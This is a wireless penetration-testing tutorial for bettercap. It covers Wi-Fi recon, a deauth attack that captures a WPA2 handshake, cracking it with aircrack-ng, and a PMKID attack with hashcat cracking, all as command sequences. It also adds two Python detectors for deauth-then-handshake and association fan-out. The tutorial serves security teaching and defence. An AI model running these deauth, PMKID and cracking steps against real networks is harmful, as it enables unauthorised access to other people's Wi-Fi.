
Wireless Penetration Testing: Bettercap

Contents
Introduction
Installation
Monitor Mode and Wi-Fi discovery
Sorting filters
Deauth attacks using Bettercap
PMKID Attack using Bettercap

Introduction
According to its official repository, bettercap is a powerful, easily extensible and portable framework written in Go that aims to offer security researchers, red teamers and reverse engineers an easy-to-use, all-in-one solution with all the features they might need for performing reconnaissance on and attacking Wi-Fi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.

Installation
To install bettercap, we’d use:

apt install bettercap

Once it is installed, we can open the interactive prompt by typing:

bettercap

Now, to find your way around the Wi-Fi testing options of this tool, the help page is available with:

help wifi

This tool also requires an older version of the libpcap library, so we first download that package with wget and install it with dpkg. Note that this replaces the system-wide libpcap package with an older build, so check whether your bettercap build still needs it before doing so.

wget http://old.kali.org/kali/pool/main/libp/libpcap/libpcap0.8_1.9.1-4_amd64.deb
dpkg -i libpcap0.8_1.9.1-4_amd64.deb

Monitor Mode and Wi-Fi discovery
Monitor mode is a receive mode for your IEEE 802.11 adapter (Wi-Fi NIC) in which the driver passes up every frame it hears, not only traffic between you and the access point you are associated with; it is often loosely called promiscuous mode. To start bettercap on your adapter in monitor mode (wlan0mon is the interface name airmon-ng gives a monitor-mode interface):

bettercap -iface wlan0mon

To start discovering Access Points around you:

wifi.recon on

Sorting filters
Often, knowing the vendor of an access point helps when checking it against known vulnerabilities. To show the manufacturer column we use the following commands:

set wifi.show.manufacturer true


wifi.show

As you can see, the manufacturer is now shown for most of the access points around me. Now, what if I want to see the access points in descending order of the number of clients connected to them? As we already know, deauth attacks capture a handshake only from APs that have clients, so an AP with more clients makes the capture quicker. For that we have:

set wifi.show.sort clients desc


wifi.show

As you can see, the APs are now arranged in descending order of the number of clients connected. Let's do the same with the ESSID and arrange it in ascending order.

set wifi.show.sort essid asc


wifi.show

Here, you can see hidden SSIDs showing up too. Their placeholder name begins with an angle bracket, which sorts before A-Z because it is a special symbol.
Now, what if we want to limit the results to, let's say, the top 3? To do this:

set wifi.show.limit 3
wifi.show

And we've limited the result to only the top 3. Now, let's enable de-authentication of open networks. Open networks are those which aren't protected by a passphrase. The wifi.deauth.open parameter controls whether the deauth module targets open networks at all:

set wifi.deauth.open true

Here, we can see that clients from 2 APs have been de-authenticated.

Deauth attacks using Bettercap


We have already seen how to recon, sort and filter. Let’s conduct a short deauth attack on an access point.
First, put your wifi adapter in monitor mode.

bettercap -iface wlan0mon

Now, we'll first list the APs found:

events.stream off
wifi.show

events.stream is bettercap's event log: it prints new hosts, captured handshakes and other events as they happen. It is enabled by default, but we turn it off here so that wifi.show produces clean output.
Now, we’ll attack AP “raaj.”

set wifi.recon.channel 5
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output wifi.pcap
net.sniff on
wifi.deauth 18:45:93:69:a5:19
events.stream on

The AP is operating on channel 5, so we first lock our adapter to channel 5 with wifi.recon.channel instead of letting it hop.
With net.sniff.verbose set to true, every captured and parsed packet is sent to events.stream for display.
net.sniff.filter ether proto 0x888e is a BPF filter that restricts the sniffer to EAPOL frames; 0x888e is the EtherType for EAPOL (IEEE 802.1X), the protocol that carries the WPA/WPA2 four-way handshake.
net.sniff.output sets the capture file to wifi.pcap.
net.sniff on turns the bettercap sniffer on.
wifi.deauth starts sending deauth frames for the specified BSSID (the MAC address of the access point).
events.stream on turns the event log back on, so bettercap now runs in verbose mode.
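From the defender's side, the sequence described above (a burst of deauthentication frames for a BSSID, then a client immediately re-running the EAPOL four-way handshake) is exactly what a wireless IDS should flag. The following detector is an added example written for this page, not code from bettercap or from the original tutorial: it parses raw IEEE 802.11 frames (no radiotap header), classifies EAPOL-Key frames by their Key Information bits, and raises an alert when handshake message 2 follows deauth frames for that client within a short window. All MAC addresses, timestamps and frames are constructed for the example.

```python
"""Detector: deauthentication burst followed by a fresh WPA2 four-way handshake.
Added example (not part of bettercap or the original tutorial); all data is constructed."""
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00" + struct.pack("!H", 0x888E)  # EtherType 0x888e
# EAPOL-Key "Key Information" bits (IEEE 802.11, clause 12.7.2)
KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0008, 0x0040, 0x0080, 0x0100, 0x0200


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def handshake_message(key_info):
    """Classify a pairwise EAPOL-Key frame as message 1-4 of the four-way handshake."""
    if not key_info & KI_PAIRWISE:
        return None
    ack, mic = key_info & KI_ACK, key_info & KI_MIC
    install, secure = key_info & KI_INSTALL, key_info & KI_SECURE
    if ack and not mic:
        return 1
    if mic and not ack and not secure:
        return 2
    if ack and mic and install:
        return 3
    if mic and not ack and secure:
        return 4
    return None


def parse_frame(raw):
    """Describe a deauthentication or EAPOL-Key frame; return None for anything else."""
    if len(raw) < 24:
        return None
    ftype, subtype, flags = (raw[0] >> 2) & 0x3, raw[0] >> 4, raw[1]
    addr1, addr2, addr3 = raw[4:10], raw[10:16], raw[16:22]
    if ftype == 0 and subtype == 12:                      # management / deauthentication
        reason = struct.unpack("<H", raw[24:26])[0] if len(raw) >= 26 else None
        return {"kind": "deauth", "dst": mac(addr1), "src": mac(addr2),
                "bssid": mac(addr3), "reason": reason}
    if ftype == 2:                                        # data frame: does it carry EAPOL?
        hdr = 24 + (6 if flags & 0x03 == 0x03 else 0) + (2 if subtype & 0x8 else 0)
        body = raw[hdr:]
        if not body.startswith(LLC_SNAP_EAPOL):
            return None
        eapol = body[8:]                                  # version, type, length, body
        if len(eapol) < 7 or eapol[1] != 3:               # EAPOL packet type 3 = EAPOL-Key
            return None
        key_info = struct.unpack("!H", eapol[5:7])[0]     # byte 4 is the descriptor type
        to_ds = flags & 0x01
        client, bssid = (addr2, addr1) if to_ds else (addr1, addr2)
        return {"kind": "eapol", "client": mac(client), "bssid": mac(bssid),
                "msg": handshake_message(key_info)}
    return None


def detect_deauth_handshake(capture, window=10.0):
    """capture: iterable of (timestamp_seconds, raw_frame). One alert per handshake
    message 2 that follows deauth frames aimed at that client within `window` seconds."""
    deauths = defaultdict(list)                           # bssid -> [(ts, destination)]
    alerts = []
    for ts, raw in capture:
        f = parse_frame(raw)
        if f is None:
            continue
        if f["kind"] == "deauth":
            deauths[f["bssid"]].append((ts, f["dst"]))
        elif f["msg"] == 2:                               # the client is re-keying
            recent = [t for t, dst in deauths[f["bssid"]]
                      if ts - window <= t <= ts and dst in (f["client"], BROADCAST)]
            if recent:
                alerts.append({"bssid": f["bssid"], "client": f["client"],
                               "deauths_in_window": len(recent), "handshake_at": ts})
    return alerts


# --- constructed sample capture (made-up locally administered MACs) ---------------
AP, STA, BCAST = bytes.fromhex("020000aa0001"), bytes.fromhex("020000bb0002"), b"\xff" * 6


def build_deauth(bssid, dst, reason=7):
    return b"\xc0\x00\x00\x00" + dst + bssid + bssid + b"\x00\x00" + struct.pack("<H", reason)


def build_eapol_key(client, bssid, key_info, to_ds):
    fc = b"\x08" + (b"\x01" if to_ds else b"\x02")
    a1, a2 = (bssid, client) if to_ds else (client, bssid)
    key = b"\x02" + struct.pack("!H", key_info) + b"\x00" * 92   # RSN descriptor, key info, padding
    eapol = b"\x02\x03" + struct.pack("!H", len(key)) + key
    return fc + b"\x00\x00" + a1 + a2 + bssid + b"\x00\x00" + LLC_SNAP_EAPOL + eapol


SAMPLE_CAPTURE = [
    (100.0, build_deauth(AP, BCAST)),                 # deauth burst spoofing the AP
    (100.1, build_deauth(AP, BCAST)),
    (100.2, build_deauth(AP, STA)),
    (101.5, build_eapol_key(STA, AP, 0x008A, False)), # msg 1, AP -> STA
    (101.6, build_eapol_key(STA, AP, 0x010A, True)),  # msg 2, STA -> AP
    (101.7, build_eapol_key(STA, AP, 0x13CA, False)), # msg 3
    (101.8, build_eapol_key(STA, AP, 0x030A, True)),  # msg 4
    (500.0, build_eapol_key(STA, AP, 0x008A, False)), # routine rekey later, no deauth
    (500.1, build_eapol_key(STA, AP, 0x010A, True)),
]

if __name__ == "__main__":
    for alert in detect_deauth_handshake(SAMPLE_CAPTURE):
        print(alert)
```

The routine rekey at t=500 produces no alert because no deauth frame precedes it, which is the distinction that separates a forced re-handshake from normal WPA2 key rotation. On a real capture the same logic runs over frames read from a pcap once the radiotap header has been stripped.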

As you can see, the client has re-authenticated after being deauthenticated by bettercap, and a handshake has been captured.
Now, we'll use aircrack-ng to crack the handshake in the captured file. We've already written an article on aircrack-ng for your reference. Note the file name used below: bettercap's wifi module writes captured handshakes to its own file, set by wifi.handshakes.file (default ~/bettercap-wifi-handshakes.pcap), not to the net.sniff.output file.

aircrack-ng bettercap-wifi-handshakes.pcap -w /root/dict.txt

Here, dict.txt is a long password file containing the most commonly used passwords and passwords I
generated given the knowledge I have about my target.

And just like that, we have cracked the Wi-Fi passphrase of “raaj.”

PMKID Attack using Bettercap


We've discussed PMKID and PMKID attacks in detail in a separate article. Now, let's see a short tutorial on how bettercap can be used to conduct a PMKID attack.

bettercap
set wifi.interface wlan0mon
wifi.recon on

Let's see the target APs available:

wifi.show

For the PMKID attack to work we have to send an association request to the target Access Point. We do
this with:

wifi.assoc <BSSID>

As we can see, we have received the RSN frame containing the PMKID, and it has been saved in pcap format. What if I want to send an association request to all the Wi-Fi networks available? To do that, the command is:

wifi.assoc all

And yes, all the vulnerable routers returned an RSN frame containing a PMKID, and it was saved to the pcap file.
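On the air, "associate with every AP in range" looks like a single station sending association requests to many different BSSIDs within seconds, which is not how a normal client behaves and is a pattern a wireless IDS can flag. The detector below is an added example written for this page, not bettercap code or code from the original tutorial: it parses raw 802.11 association request frames (type 0, subtype 0, no radiotap header) and reports any station that associates with a configurable number of distinct BSSIDs inside a sliding window. MAC addresses, frames and timestamps are constructed for the example.

```python
"""Detector: one station sending association requests to many BSSIDs (assoc fan-out).
Added example (not part of bettercap or the original tutorial); all data is constructed."""
import struct
from collections import defaultdict

ASSOC_REQ = (0, 0)   # 802.11 management frame (type 0), subtype 0 = association request


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_assoc_request(raw):
    """Return (station, bssid) for an association request frame, else None."""
    if len(raw) < 24:
        return None
    fc = raw[0]
    if ((fc >> 2) & 0x3, fc >> 4) != ASSOC_REQ:
        return None
    # addr2 is the transmitter (the station), addr1 the receiver (the BSSID)
    return mac(raw[10:16]), mac(raw[4:10])


def detect_assoc_fanout(capture, window=30.0, threshold=3):
    """capture: iterable of (timestamp_seconds, raw_frame). Returns {station: [bssids]}
    for every station seen associating with >= threshold distinct BSSIDs in `window`."""
    seen = defaultdict(list)   # station -> [(ts, bssid)]
    alerts = {}
    for ts, raw in capture:
        parsed = parse_assoc_request(raw)
        if parsed is None:
            continue
        sta, bssid = parsed
        seen[sta].append((ts, bssid))
        recent = {b for t, b in seen[sta] if ts - window <= t <= ts}
        if len(recent) >= threshold:
            alerts[sta] = sorted(recent)
    return alerts


# --- constructed sample capture (made-up locally administered MACs) ---------------
def build_assoc_request(sta, bssid):
    # FC 0x0000 | duration | addr1=BSSID | addr2=STA | addr3=BSSID | seq | capability | listen interval
    return (b"\x00\x00\x00\x00" + bssid + sta + bssid + b"\x00\x00"
            + struct.pack("<HH", 0x0431, 10))


SCANNER = bytes.fromhex("020000cc0001")   # station that associates with everything
NORMAL = bytes.fromhex("020000dd0002")    # ordinary client roaming between two APs
APS = [bytes.fromhex(f"020000aa00{i:02x}") for i in range(1, 5)]

SAMPLE_CAPTURE = (
    [(10.0 + i, build_assoc_request(SCANNER, ap)) for i, ap in enumerate(APS)]
    + [(200.0, build_assoc_request(NORMAL, APS[0])),
       (900.0, build_assoc_request(NORMAL, APS[1]))]   # roaming minutes apart: not flagged
)

if __name__ == "__main__":
    for sta, bssids in detect_assoc_fanout(SAMPLE_CAPTURE).items():
        print(f"{sta} associated with {len(bssids)} BSSIDs in one window: {bssids}")
```

The threshold and window are the tuning knobs: a legitimate client re-associating after roaming touches one or two BSSIDs over minutes, whereas the scanning station touches four in four seconds. Reusing the station's own radio MAC across all requests is what makes the pattern visible; the detector keys on that address.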
Now we can use hcxpcaptool to convert this pcap file into a hashcat-crackable format and use hashcat to crack the PMK hash.

hcxpcaptool -z hashpmkid bettercap-wifi-handshakes.pcap


hashcat -m 16800 --force hashpmkid /usr/share/wordlists/rockyou.txt --show

Here, 16800 is the hashcat mode number for the PMKID WPA/WPA2 hash type, and we have used the rockyou dictionary.

And it's that simple. Bettercap is a sniffer with many other features besides Wi-Fi packet sniffing.
